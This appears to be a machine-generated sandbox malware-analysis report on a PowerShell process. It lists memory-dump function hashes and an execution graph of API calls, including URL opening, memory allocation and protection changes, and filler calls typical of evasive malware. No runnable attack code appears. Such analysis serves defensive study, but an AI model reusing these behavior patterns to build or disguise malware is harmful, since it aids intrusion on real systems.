                              • Source File: 0000000C.00000002.396116759.00007FFBAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC410000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_7ffbac410000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 21a7e74ee475e31a20754763548232013f8a4b7737391038bcb6a475d2a6b6e6
                              • Instruction ID: 9b9b6434f5c3a9a2a63df8923fb69f15b6acad8e47fc6adb246df73684456978
                              • Opcode Fuzzy Hash: 21a7e74ee475e31a20754763548232013f8a4b7737391038bcb6a475d2a6b6e6
                              • Instruction Fuzzy Hash: C401677111CB0C4FD744EF0CE451AA6B7E0FB95324F50056EE58AC3665DA36E882CB45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFBAC416A08 Relevance: .0, Instructions: 42COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000C.00000002.396116759.00007FFBAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC410000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_7ffbac410000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e3c4178db7fbfeafe4b1facbaf10c67a84702e4ed335b88631431d0b133dd609
                              • Instruction ID: 61360c8fdbcd3f287e4bb3f53c21336c4b612fefb1c211738ae3f3b1d71f515f
                              • Opcode Fuzzy Hash: e3c4178db7fbfeafe4b1facbaf10c67a84702e4ed335b88631431d0b133dd609
                              • Instruction Fuzzy Hash: BAF024748486894FDB069F28D85A4D57FE0EF16351B04429BE848C71A2DB64D858CBC2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFBAC415343 Relevance: .0, Instructions: 42COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000C.00000002.396116759.00007FFBAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC410000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_7ffbac410000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c2a8fb3734cc71c2f422878f3540dafd99ba4a89838d2675691a83de90851e99
                              • Instruction ID: d2ed5dcebecb51ec55869979e90ee0020ebe6b05696b7ab2b0154587f6978628
                              • Opcode Fuzzy Hash: c2a8fb3734cc71c2f422878f3540dafd99ba4a89838d2675691a83de90851e99
                              • Instruction Fuzzy Hash: 7BF0A03231CA0C0BE70CAA1CB8424F973C1DB99360B40417FF40AC6297DC26AC8382CA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00007FFBAC418B88 Relevance: .0, Instructions: 39COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 0000000C.00000002.396116759.00007FFBAC410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC410000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_12_2_7ffbac410000_powershell.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6ef551260b1d9975afe40ebec1243d461aa76d1f7dd1eef8ed2c57342edf2a85
                              • Instruction ID: 2983851769f15d1f8e81e11f3b5ca222aacd523bd53df1213a8e28e16d5ffbbb
                              • Opcode Fuzzy Hash: 6ef551260b1d9975afe40ebec1243d461aa76d1f7dd1eef8ed2c57342edf2a85
                              • Instruction Fuzzy Hash: C0F0307275CA088FDB4CAA1CF8429B5B3D1EB99324B00017EF48BC2696D927F842C685
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:2.6%
                              Dynamic/Decrypted Code Coverage:98.8%
                              Signature Coverage:23.8%
                              Total number of Nodes:727
                              Total number of Limit Nodes:31
                              execution_graph 56494 7ff62c8f5074 56496 7ff62c8f508b InternetOpenUrlW 56494->56496 56497 7ff62c8f5191 56498 7ff62c8f5171 56497->56498 56499 7ff62c8f520a GetMessageTime 56498->56499 56500 7ff62c8f521c 56499->56500 56501 7ff62c8f52c8 GetUserDefaultLangID 56500->56501 56502 7ff62c8f52d4 56501->56502 56503 7ff62c8f52d6 GetSystemDefaultLangID 56502->56503 56503->56503 56504 7ff62c8f52ed GetParent GetDoubleClickTime GetDoubleClickTime 56503->56504 56505 7ff62c8f5306 56504->56505 56506 7ff62c8f5375 GetWindowTextLengthW GetMessageExtraInfo 56505->56506 56507 7ff62c8f5385 56506->56507 56508 7ff62c8f541a IsIconic IsIconic GetDoubleClickTime GetLastActivePopup GetMessageTime 56507->56508 56509 7ff62c8f544c 56508->56509 56510 7ff62c8f54b0 GetCurrentProcessId 56509->56510 56511 7ff62c8f54b8 GetShellWindow 56510->56511 56511->56511 56512 7ff62c8f54cf GetTopWindow GetMessageExtraInfo 56511->56512 56513 7ff62c8f54e8 56512->56513 56514 7ff62c8f5541 GetParent 56513->56514 56515 7ff62c8f554e 56514->56515 56516 7ff62c8f5603 GetTopWindow 56515->56516 56516->56516 56517 7ff62c8f561c 56516->56517 56518 7ff62c8f75c5 GetLastActivePopup 56517->56518 56519 7ff62c8f75dd 56518->56519 56520 7ff62c8f7657 IsIconic 56519->56520 56521 7ff62c8f7664 56520->56521 56522 7ff62c8f76b7 GetMessageExtraInfo 56521->56522 56523 7ff62c8f76c8 56522->56523 56523->56523 56524 7ff62c8f7805 GetMessageExtraInfo GetCurrentProcessId GetShellWindow 56523->56524 56525 7ff62c8f7834 56524->56525 56526 7ff62c8f796d GetUserDefaultLangID 56525->56526 56527 7ff62c8f7975 56526->56527 56528 7ff62c8f79d5 GetShellWindow AnyPopup GetCommandLineW 56527->56528 56529 7ff62c8f79fd 56528->56529 56530 7ff62c8f7b3d GetMessageTime 56529->56530 56532 7ff62c8f7b48 56530->56532 56531 7ff62c8f7c4e GetSystemDefaultLangID GetMessageExtraInfo GetTickCount 56533 7ff62c8f7c6d GetTickCount 56531->56533 56532->56531 56533->56533 56534 7ff62c8f7c86 GetCurrentProcessId GetTickCount IsIconic 56533->56534 56535 7ff62c8f7c9c 56534->56535 56535->56535 56536 7ff62c8f7cac GetCommandLineW 56535->56536 56537 7ff62c8f7cba GetDesktopWindow 56536->56537 56538 7ff62c8f7cd2 56537->56538 56539 7ff62c8f7ce9 IsZoomed 56538->56539 56540 7ff62c8f7cf9 56539->56540 56541 7ff62c8f7d6e GetLastActivePopup 56540->56541 56542 7ff62c8f7d7b 56541->56542 56542->56542 56543 7ff62c8f7edf GetDoubleClickTime 56542->56543 56545 7ff62c8f7eed 56543->56545 56544 7ff62c8f80a5 IsIconic 56544->56545 56545->56544 56546 7ff62c8f812e 56545->56546 56546->56546 56547 7ff62c8f2c6e 56548 7ff62c8f2e9e 56547->56548 56551 7ff62c8f2ca4 56547->56551 56559 7ff62c8fb470 18 API calls 56548->56559 56550 7ff62c8f2ed0 56552 7ff62c8f3098 56551->56552 56555 7ff62c8f2d98 56551->56555 56557 7ff62c8f2420 56551->56557 56560 7ff62c939540 20 API calls 56552->56560 56554 7ff62c8f5066 56555->56557 56558 7ff62c8fb470 18 API calls 56555->56558 56558->56555 56559->56550 56560->56554 56561 7ff62c8f834d 56562 7ff62c8f82ea 56561->56562 56660 7ff62c906fb0 56562->56660 56566 7ff62c8f844b 56567 7ff62c8f56bc 49 API calls 56566->56567 56568 7ff62c8f845c 56567->56568 56569 7ff62c8f84d5 GetLastActivePopup GetDesktopWindow GetTopWindow GetCurrentProcess 56568->56569 56570 7ff62c8f8502 56569->56570 56570->56570 56571 7ff62c8f852c AnyPopup 56570->56571 56572 7ff62c8f8537 56571->56572 56573 7ff62c8f8742 GetMessageTime GetCurrentProcessId GetTopWindow 56572->56573 56574 7ff62c8f875e 56573->56574 56575 7ff62c8f898b GetModuleHandleW 56574->56575 56576 7ff62c8f8995 56575->56576 56576->56576 56577 7ff62c8f89b7 GetMessageExtraInfo 56576->56577 56578 7ff62c8f89bf 56577->56578 56579 7ff62c8f8a1e GetTopWindow GetCurrentProcessId 56578->56579 56580 7ff62c8f8a31 56579->56580 56581 7ff62c8f8a94 GetTickCount 56580->56581 56581->56581 56582 7ff62c8f8aad GetCurrentProcess 56581->56582 56583 7ff62c8f8ab6 56582->56583 56584 7ff62c8f8c0a GetLastActivePopup 56583->56584 56585 7ff62c8f8c17 56584->56585 56586 7ff62c8f8c9f GetLastActivePopup GetParent 56585->56586 56587 7ff62c8f8cc8 56586->56587 56588 7ff62c8f8d4e GetDesktopWindow GetUserDefaultLangID GetForegroundWindow GetForegroundWindow 56587->56588 56589 7ff62c8f8d77 56588->56589 56590 7ff62c8f8e21 GetLargePageMinimum 56589->56590 56591 7ff62c8f8e34 56590->56591 56592 7ff62c8f8ec0 GetMessageExtraInfo 56591->56592 56593 7ff62c8f8ecb 56592->56593 56594 7ff62c8f8ee0 GetLargePageMinimum 56593->56594 56596 7ff62c8f8f0b 56593->56596 56594->56593 56594->56594 56595 7ff62c8f9010 GetParent IsIconic 56597 7ff62c8f9023 56595->56597 56596->56595 56598 7ff62c8f9065 GetMessageExtraInfo 56597->56598 56599 7ff62c8f906d 56598->56599 56600 7ff62c8f90b6 GetWindowTextLengthW 56599->56600 56601 7ff62c8f90be 56600->56601 56602 7ff62c8f910e GetLastActivePopup 56601->56602 56603 7ff62c8f90ed 56601->56603 56602->56603 56604 7ff62c8f915f AnyPopup 56603->56604 56605 7ff62c8f9167 56604->56605 56606 7ff62c8f91a3 GetWindowTextLengthW GetUserDefaultLangID 56605->56606 56607 7ff62c8f91d5 56606->56607 56609 7ff62c8fce80 18 API calls 56607->56609 56659 7ff62c8fa2cd 56607->56659 56608 7ff62c8fb610 49 API calls 56611 7ff62c8fa5fb 56608->56611 56610 7ff62c8f91ea GetForegroundWindow 56609->56610 56613 7ff62c8f9212 56610->56613 56614 7ff62c8f9242 GetDoubleClickTime 56613->56614 56615 7ff62c8f924d 56614->56615 56616 7ff62c8f92ed GetUserDefaultLangID 56615->56616 56617 7ff62c8f92f8 56616->56617 56618 7ff62c8f93ba GetLargePageMinimum 56617->56618 56619 7ff62c8f93ca 56618->56619 56620 7ff62c8f93ed GetModuleHandleW 56619->56620 56621 7ff62c8f93f7 56620->56621 56621->56621 56622 7ff62c8f941d IsZoomed 56621->56622 56622->56622 56623 7ff62c8f9438 56622->56623 56624 7ff62c8f954f GetWindowTextLengthW 56623->56624 56625 7ff62c8f956a 56624->56625 56626 7ff62c8f9598 GetDesktopWindow GetTopWindow GetCommandLineW GetTopWindow GetMessageTime 56625->56626 56627 7ff62c8f95cb 56626->56627 56628 7ff62c8f95f6 GetSystemDefaultLangID 56627->56628 56630 7ff62c8f9618 56628->56630 56629 7ff62c8f9712 AnyPopup 56629->56630 56630->56629 56631 7ff62c8f980f 56630->56631 56632 7ff62c8f99be GetCurrentProcessId GetUserDefaultLangID GetSystemDefaultLangID 56631->56632 56633 7ff62c8f99f3 56632->56633 56634 7ff62c8f9a7a GetTopWindow 56633->56634 56635 7ff62c8f9a85 GetSystemDefaultLangID 56634->56635 56635->56635 56636 7ff62c8f9a9e 56635->56636 56636->56636 56637 7ff62c8f9c55 GetMessageTime GetMessageExtraInfo IsZoomed 56636->56637 56638 7ff62c8f9c71 56637->56638 56639 7ff62c8f9cbd GetForegroundWindow GetDoubleClickTime GetUserDefaultLangID 56638->56639 56640 7ff62c8f9ce7 56639->56640 56641 7ff62c8f9d3b GetLargePageMinimum 56640->56641 56641->56640 56642 7ff62c8f9d60 GetShellWindow 56641->56642 56643 7ff62c8f9d6b 56642->56643 56644 7ff62c8f9ebf GetCurrentProcessId 56643->56644 56645 7ff62c8f9edd 56644->56645 56646 7ff62c8f9f00 GetCommandLineW GetModuleHandleW 56645->56646 56647 7ff62c8f9f1d 56646->56647 56648 7ff62c8f9f38 GetCommandLineW 56647->56648 56649 7ff62c8f9f43 56648->56649 56650 7ff62c8fdc20 18 API calls 56649->56650 56651 7ff62c8fa050 56650->56651 56652 7ff62c8fe2b0 18 API calls 56651->56652 56653 7ff62c8fa069 56652->56653 56654 7ff62c8fa1c5 GetCommandLineW 56653->56654 56655 7ff62c8fa1d0 56654->56655 56656 7ff62c8fa27a GetCurrentProcessId GetLargePageMinimum GetMessageExtraInfo 56655->56656 56657 7ff62c8fa291 56656->56657 56658 7ff62c8fa2b3 GetWindowTextLengthW 56657->56658 56658->56659 56659->56608 56673 7ff62c8fb7c0 56660->56673 56663 7ff62c9075f0 56666 7ff62c907610 56663->56666 56667 7ff62c907645 56666->56667 57108 7ff62c8fda80 18 API calls 56666->57108 57109 7ff62c8fdd00 18 API calls 56666->57109 57110 7ff62c906b70 18 API calls 56667->57110 56669 7ff62c90765d 56672 7ff62c90769b 56669->56672 57111 7ff62c8fda80 18 API calls 56669->57111 57112 7ff62c8fe2b0 56669->57112 56674 7ff62c8fb7ec 56673->56674 56678 7ff62c8fb80e _fread_nolock 56674->56678 56681 7ff62c8fb96b 56674->56681 56683 7ff62c914990 GetLastError VirtualAlloc SetLastError 56674->56683 56677 7ff62c8f8438 56677->56663 56678->56681 56692 7ff62c8f3037 56678->56692 56680 7ff62c8fb957 56680->56681 56699 7ff62c8fb1c0 GetLastError VirtualQuery VirtualFree SetLastError VirtualFree 56680->56699 56685 7ff62c973de0 56681->56685 56684 7ff62c9149dc _fread_nolock 56683->56684 56684->56678 56686 7ff62c973de9 56685->56686 56687 7ff62c973df4 56686->56687 56688 7ff62c974a24 IsProcessorFeaturePresent 56686->56688 56687->56677 56689 7ff62c974a3c 56688->56689 56700 7ff62c974d28 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 56689->56700 56691 7ff62c974a4f 56691->56677 56701 7ff62c911c26 56692->56701 56709 7ff62c911cf0 56692->56709 56714 7ff62c911a20 56692->56714 56718 7ff62c904bf0 56692->56718 56736 7ff62c911aa8 56692->56736 56693 7ff62c8f2420 56693->56680 56699->56681 56700->56691 56703 7ff62c911c32 56701->56703 56702 7ff62c911a50 56706 7ff62c911aa3 56702->56706 56747 7ff62c910a90 56702->56747 56703->56702 56763 7ff62c939ca0 56703->56763 56706->56693 56876 7ff62c952750 56709->56876 56711 7ff62c911d05 56712 7ff62c911d0d 56711->56712 56907 7ff62c911d70 56711->56907 56712->56693 56715 7ff62c911a50 56714->56715 56716 7ff62c910a90 37 API calls 56715->56716 56717 7ff62c911aa3 56715->56717 56716->56715 56717->56693 56976 7ff62c913c30 56718->56976 56720 7ff62c904c3f 56721 7ff62c904c4d 56720->56721 56722 7ff62c904c46 56720->56722 56997 7ff62c9225b0 18 API calls _handle_error 56721->56997 56985 7ff62c91cb60 56722->56985 56725 7ff62c904c18 56725->56720 56727 7ff62c904c8f 56725->56727 56726 7ff62c904c4b 56998 7ff62c90c900 18 API calls 56726->56998 56999 7ff62c901970 18 API calls _fread_nolock 56727->56999 56730 7ff62c904c61 56730->56693 56731 7ff62c904ca8 56732 7ff62c901990 18 API calls 56731->56732 56733 7ff62c904cc5 vwprintf 56732->56733 57000 7ff62c99c09c 19 API calls 3 library calls 56733->57000 56735 7ff62c904d0c 56735->56693 56737 7ff62c9116c0 35 API calls 56736->56737 56738 7ff62c911aba 56737->56738 56739 7ff62c911bfd 56738->56739 56740 7ff62c911a50 56738->56740 57079 7ff62c954220 18 API calls 56738->57079 57034 7ff62c93f2c0 56739->57034 56743 7ff62c910a90 37 API calls 56740->56743 56745 7ff62c911aa3 56740->56745 56743->56740 56744 7ff62c911b32 56744->56739 57080 7ff62c954120 16 API calls vwprintf 56744->57080 56745->56693 56783 7ff62c93b310 56747->56783 56749 7ff62c910b43 56749->56702 56750 7ff62c910e18 56751 7ff62c910e89 56750->56751 56752 7ff62c910e4f 56750->56752 56755 7ff62c910e97 56751->56755 56819 7ff62c910280 35 API calls _fread_nolock 56751->56819 56754 7ff62c910e74 56752->56754 56803 7ff62c9116c0 56752->56803 56754->56702 56755->56702 56756 7ff62c910cc7 56756->56750 56791 7ff62c90a4b0 56756->56791 56757 7ff62c910ab5 56757->56749 56757->56750 56790 7ff62c954220 18 API calls 56757->56790 56762 7ff62c910cf6 56802 7ff62c954120 16 API calls vwprintf 56762->56802 56764 7ff62c939cb9 56763->56764 56765 7ff62c911c7e 56763->56765 56846 7ff62c939a10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind _handle_error 56764->56846 56767 7ff62c939dd0 56765->56767 56768 7ff62c8f3037 43 API calls 56767->56768 56769 7ff62c939e1e 56768->56769 56777 7ff62c939e7e 56769->56777 56847 7ff62c901990 56769->56847 56771 7ff62c939ebc 56772 7ff62c939ecc 56771->56772 56773 7ff62c93bce8 56771->56773 56774 7ff62c93bcb5 56771->56774 56772->56702 56859 7ff62c90fe90 56773->56859 56858 7ff62c909c30 18 API calls 56774->56858 56777->56702 56779 7ff62c93bcd7 56779->56702 56784 7ff62c93b325 56783->56784 56785 7ff62c93b34a 56783->56785 56784->56785 56786 7ff62c93b32e VirtualProtect 56784->56786 56785->56757 56786->56785 56787 7ff62c93b35a 56786->56787 56820 7ff62c93b9d0 19 API calls 56787->56820 56789 7ff62c93b362 56790->56756 56792 7ff62c90a6ea 56791->56792 56796 7ff62c90a4d9 56791->56796 56793 7ff62c90a6ef 56792->56793 56828 7ff62c901650 18 API calls 56792->56828 56793->56762 56799 7ff62c90a598 56796->56799 56821 7ff62c909d30 56796->56821 56798 7ff62c90a606 _fread_nolock 56800 7ff62c90a6e2 56798->56800 56827 7ff62c90a850 18 API calls _fread_nolock 56798->56827 56799->56762 56802->56750 56804 7ff62c9116d7 56803->56804 56805 7ff62c911714 56803->56805 56804->56754 56806 7ff62c9117c5 56805->56806 56807 7ff62c9119e9 56805->56807 56841 7ff62c909c30 18 API calls 56805->56841 56806->56807 56808 7ff62c9117f1 56806->56808 56845 7ff62c910280 35 API calls _fread_nolock 56807->56845 56811 7ff62c9119df 56808->56811 56842 7ff62c954220 18 API calls 56808->56842 56844 7ff62c9418b0 18 API calls _fread_nolock 56811->56844 56813 7ff62c9119e7 56813->56754 56815 7ff62c91189b 56815->56811 56816 7ff62c90a4b0 18 API calls 56815->56816 56817 7ff62c9118c8 56816->56817 56843 7ff62c954120 16 API calls vwprintf 56817->56843 56819->56755 56820->56789 56829 7ff62c915190 56821->56829 56823 7ff62c909d61 56823->56798 56827->56800 56830 7ff62c9151aa 56829->56830 56832 7ff62c909d57 56830->56832 56834 7ff62c914230 56830->56834 56832->56823 56833 7ff62c9015c0 18 API calls 56832->56833 56835 7ff62c91426b 56834->56835 56836 7ff62c9142fd 56834->56836 56835->56836 56838 7ff62c91427e GetLastError VirtualAlloc SetLastError 56835->56838 56837 7ff62c914314 GetLastError VirtualAlloc SetLastError 56836->56837 56840 7ff62c91434f 56836->56840 56837->56840 56838->56836 56839 7ff62c9142b6 56838->56839 56839->56836 56839->56840 56840->56832 56841->56806 56842->56815 56843->56811 56844->56813 56845->56813 56846->56765 56862 7ff62c900c60 56847->56862 56849 7ff62c9019ad 56850 7ff62c9019de 56849->56850 56874 7ff62c9017a0 18 API calls 56849->56874 56851 7ff62c901990 17 API calls 56850->56851 56853 7ff62c9019e4 56851->56853 56854 7ff62c901a37 56853->56854 56855 7ff62c901b01 56853->56855 56875 7ff62c901970 18 API calls _fread_nolock 56853->56875 56854->56771 56855->56854 56857 7ff62c901b6b RtlUnwindEx 56855->56857 56857->56854 56858->56779 56860 7ff62c901990 18 API calls 56859->56860 56861 7ff62c90fed0 56860->56861 56863 7ff62c900c91 _fread_nolock 56862->56863 56864 7ff62c900da0 RaiseException _purecall 56862->56864 56865 7ff62c900cab RtlCaptureContext RtlLookupFunctionEntry 56863->56865 56866 7ff62c900d3e 56865->56866 56867 7ff62c900cd9 56865->56867 56870 7ff62c900d76 56866->56870 56871 7ff62c900d58 RtlRestoreContext 56866->56871 56868 7ff62c900ce0 RtlVirtualUnwind 56867->56868 56869 7ff62c900d1e RtlLookupFunctionEntry 56868->56869 56868->56870 56869->56866 56869->56868 56872 7ff62c973de0 _handle_error 4 API calls 56870->56872 56871->56870 56873 7ff62c900d96 56872->56873 56873->56849 56875->56855 56878 7ff62c95279d 56876->56878 56877 7ff62c9527cc 56917 7ff62c90fde0 56877->56917 56878->56877 56932 7ff62c958dc0 18 API calls 56878->56932 56881 7ff62c952807 56920 7ff62c93b610 56881->56920 56883 7ff62c90fe90 18 API calls 56884 7ff62c952e98 56883->56884 56885 7ff62c90fe90 18 API calls 56884->56885 56888 7ff62c952ea7 56885->56888 56886 7ff62c952e7f 56929 7ff62c94d2d0 56886->56929 56888->56711 56889 7ff62c952e89 56889->56883 56895 7ff62c94f820 23 API calls 56899 7ff62c952854 56895->56899 56898 7ff62c952ce1 _fread_nolock 56941 7ff62c94f930 23 API calls _handle_error 56898->56941 56899->56886 56899->56889 56899->56895 56899->56898 56900 7ff62c90fde0 18 API calls 56899->56900 56933 7ff62c94e460 18 API calls 56899->56933 56934 7ff62c9503f0 23 API calls 56899->56934 56935 7ff62c94f930 23 API calls _handle_error 56899->56935 56936 7ff62c94b5e0 18 API calls 56899->56936 56937 7ff62c949610 23 API calls 56899->56937 56938 7ff62c953750 23 API calls 56899->56938 56939 7ff62c949f10 23 API calls _handle_error 56899->56939 56940 7ff62c958bc0 18 API calls 56899->56940 56900->56899 56903 7ff62c952d24 56903->56884 56904 7ff62c952d2e 56903->56904 56905 7ff62c973de0 _handle_error 4 API calls 56904->56905 56906 7ff62c952e6e 56905->56906 56906->56711 56908 7ff62c911db2 56907->56908 56967 7ff62c93b370 56908->56967 56910 7ff62c911ec0 _fread_nolock 56911 7ff62c912056 56910->56911 56973 7ff62c954220 18 API calls 56910->56973 56911->56712 56913 7ff62c911fd7 56913->56911 56914 7ff62c90a4b0 18 API calls 56913->56914 56915 7ff62c912000 56914->56915 56974 7ff62c954120 16 API calls vwprintf 56915->56974 56918 7ff62c909d30 18 API calls 56917->56918 56919 7ff62c90fe25 _fread_nolock 56918->56919 56919->56881 56921 7ff62c93b636 56920->56921 56922 7ff62c93b62c 56920->56922 56924 7ff62c93b63f VirtualProtect 56921->56924 56925 7ff62c93b634 56921->56925 56942 7ff62c93b7f0 56922->56942 56924->56925 56926 7ff62c93b681 56924->56926 56925->56899 56950 7ff62c93b9d0 19 API calls 56926->56950 56928 7ff62c93b689 56951 7ff62c93b430 56929->56951 56932->56877 56933->56899 56934->56899 56935->56899 56936->56899 56937->56899 56938->56899 56939->56899 56940->56899 56941->56903 56945 7ff62c93b846 56942->56945 56943 7ff62c93b84b VirtualAlloc 56943->56945 56944 7ff62c93b8d6 56944->56925 56945->56943 56945->56944 56946 7ff62c93b889 VirtualFree 56945->56946 56947 7ff62c93b934 56945->56947 56946->56945 56948 7ff62c90fe90 18 API calls 56947->56948 56949 7ff62c93b941 VirtualFree 56948->56949 56950->56928 56952 7ff62c93b44c 56951->56952 56954 7ff62c93b484 56951->56954 56953 7ff62c93b455 VirtualProtect 56952->56953 56952->56954 56955 7ff62c93b479 56953->56955 56956 7ff62c93b471 56953->56956 56957 7ff62c90fe90 18 API calls 56954->56957 56958 7ff62c93b4b7 56954->56958 56955->56954 56966 7ff62c93b9d0 19 API calls 56956->56966 56957->56958 56959 7ff62c93b4d1 56958->56959 56962 7ff62c90fe90 18 API calls 56958->56962 56960 7ff62c93b7f0 21 API calls 56959->56960 56963 7ff62c93b4d7 56960->56963 56962->56959 56964 7ff62c90fe90 18 API calls 56963->56964 56965 7ff62c93b4e4 56964->56965 56966->56955 56968 7ff62c93b389 VirtualProtect 56967->56968 56969 7ff62c93b3ac 56967->56969 56968->56969 56970 7ff62c93b3bc 56968->56970 56969->56910 56975 7ff62c93b9d0 19 API calls 56970->56975 56972 7ff62c93b3c4 56973->56913 56974->56911 56975->56972 56979 7ff62c913c97 56976->56979 56977 7ff62c913da4 56977->56725 56979->56977 56984 7ff62c913d96 56979->56984 57001 7ff62c913ac0 18 API calls 56979->57001 56980 7ff62c913df4 56981 7ff62c901990 18 API calls 56980->56981 56982 7ff62c913e11 56981->56982 56984->56977 57002 7ff62c901970 18 API calls _fread_nolock 56984->57002 57003 7ff62c91c380 56985->57003 56987 7ff62c91ccb6 57022 7ff62c91c160 18 API calls _fread_nolock 56987->57022 56989 7ff62c91ccc4 56990 7ff62c91c1c0 18 API calls 56991 7ff62c91cb84 56990->56991 56991->56987 56991->56990 56992 7ff62c91cc4b 56991->56992 57014 7ff62c91ccd0 56991->57014 57020 7ff62c8fb4d0 18 API calls 56991->57020 56993 7ff62c91cc7a 56992->56993 57021 7ff62c91c160 18 API calls _fread_nolock 56992->57021 56993->56726 56997->56726 56998->56730 56999->56731 57000->56735 57002->56980 57004 7ff62c91c398 57003->57004 57007 7ff62c91c3a4 57003->57007 57023 7ff62c91c1c0 18 API calls _fread_nolock 57004->57023 57006 7ff62c91c4ca 57006->56991 57007->57006 57009 7ff62c91c43f 57007->57009 57024 7ff62c934580 18 API calls 57007->57024 57010 7ff62c91c455 57009->57010 57025 7ff62c91c1c0 18 API calls _fread_nolock 57009->57025 57012 7ff62c90a4b0 18 API calls 57010->57012 57013 7ff62c91c4ac 57012->57013 57013->56991 57016 7ff62c91cd44 57014->57016 57026 7ff62c909cc0 57016->57026 57018 7ff62c91cdc3 _fread_nolock 57032 7ff62c91c4e0 18 API calls 57018->57032 57019 7ff62c91cfdb _fread_nolock 57019->56991 57019->57019 57020->56991 57021->56987 57022->56989 57023->57007 57024->57009 57025->57010 57031 7ff62c915190 6 API calls 57026->57031 57027 7ff62c909ce7 57028 7ff62c909cef 57027->57028 57033 7ff62c9015c0 18 API calls 57027->57033 57028->57018 57031->57027 57032->57019 57035 7ff62c93f308 57034->57035 57036 7ff62c93f4fe 57035->57036 57040 7ff62c93f506 57035->57040 57095 7ff62c93bd80 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind _handle_error 57035->57095 57096 7ff62c93bb10 18 API calls 57036->57096 57037 7ff62c93f518 57037->56740 57040->57037 57041 7ff62c940a6f 57040->57041 57045 7ff62c93f564 57040->57045 57043 7ff62c90fe90 18 API calls 57041->57043 57042 7ff62c93f5e8 57052 7ff62c93f64a 57042->57052 57098 7ff62c945970 18 API calls 57042->57098 57044 7ff62c940a7c 57043->57044 57048 7ff62c90fe90 18 API calls 57044->57048 57045->57042 57081 7ff62c963c80 57045->57081 57046 7ff62c93f6aa 57049 7ff62c93f6e8 57046->57049 57050 7ff62c93f79b 57046->57050 57051 7ff62c940a87 57048->57051 57058 7ff62c93f6f6 57049->57058 57059 7ff62c93f73c 57049->57059 57074 7ff62c93f732 57049->57074 57050->57074 57103 7ff62c945970 18 API calls 57050->57103 57053 7ff62c90fe90 18 API calls 57051->57053 57052->57046 57099 7ff62c945970 18 API calls 57052->57099 57060 7ff62c940a95 57053->57060 57056 7ff62c93f5e0 57097 7ff62c93bb10 18 API calls 57056->57097 57058->57074 57100 7ff62c958f20 18 API calls 57058->57100 57062 7ff62c93f76d 57059->57062 57063 7ff62c93f75b 57059->57063 57064 7ff62c90fe90 18 API calls 57060->57064 57102 7ff62c959140 18 API calls 57062->57102 57101 7ff62c958fd0 18 API calls 57063->57101 57068 7ff62c940aa3 57064->57068 57069 7ff62c90fe90 18 API calls 57068->57069 57070 7ff62c940ab1 57069->57070 57071 7ff62c90fe90 18 API calls 57070->57071 57072 7ff62c940abc 57071->57072 57075 7ff62c90fe90 18 API calls 57072->57075 57073 7ff62c90fe90 18 API calls 57076 7ff62c940af7 57073->57076 57074->57037 57074->57073 57077 7ff62c940aca 57075->57077 57104 7ff62c90fee0 18 API calls 57077->57104 57079->56744 57080->56739 57082 7ff62c963cad 57081->57082 57083 7ff62c963e93 57082->57083 57085 7ff62c963e91 57082->57085 57086 7ff62c963e7e 57082->57086 57106 7ff62c9604f0 18 API calls 57083->57106 57085->57056 57087 7ff62c963e9d 57086->57087 57088 7ff62c963e83 57086->57088 57087->57085 57090 7ff62c90fe90 18 API calls 57087->57090 57105 7ff62c958fd0 18 API calls 57088->57105 57092 7ff62c963edf 57090->57092 57091 7ff62c963eed 57091->57056 57092->57091 57107 7ff62c958fd0 18 API calls 57092->57107 57094 7ff62c963f22 57094->57056 57095->57036 57096->57040 57097->57042 57098->57052 57099->57046 57100->57074 57101->57074 57102->57074 57103->57074 57105->57085 57106->57085 57107->57094 57108->56666 57109->56666 57110->56669 57111->56669 57113 7ff62c8fe2c5 57112->57113 57114 7ff62c90a4b0 18 API calls 57113->57114 57115 7ff62c8fe2e5 57114->57115 57118 7ff62c90dcb0 18 API calls 57115->57118 57117 7ff62c8fe307 57117->56669 57118->57117 57119 7ff62c911e28 57130 7ff62c9525b0 57119->57130 57121 7ff62c911e4c 57122 7ff62c93b370 20 API calls 57121->57122 57124 7ff62c911ec0 _fread_nolock 57122->57124 57123 7ff62c912056 57124->57123 57125 7ff62c954220 18 API calls 57124->57125 57126 7ff62c911fd7 57125->57126 57126->57123 57127 7ff62c90a4b0 18 API calls 57126->57127 57128 7ff62c912000 57127->57128 57129 7ff62c954120 16 API calls 57128->57129 57129->57123 57133 7ff62c93b4f0 57130->57133 57132 7ff62c9525e9 57134 7ff62c93b57e 57133->57134 57135 7ff62c93b505 57133->57135 57138 7ff62c93b5d3 57134->57138 57142 7ff62c93b59a 57134->57142 57136 7ff62c93b551 VirtualProtect 57135->57136 57137 7ff62c93b511 57135->57137 57140 7ff62c93b571 57136->57140 57141 7ff62c93b600 57136->57141 57139 7ff62c93b51a VirtualProtect 57137->57139 57137->57140 57138->57138 57143 7ff62c93b5e8 VirtualProtect 57138->57143 57139->57141 57145 7ff62c93b53a 57139->57145 57140->57132 57150 7ff62c93b9d0 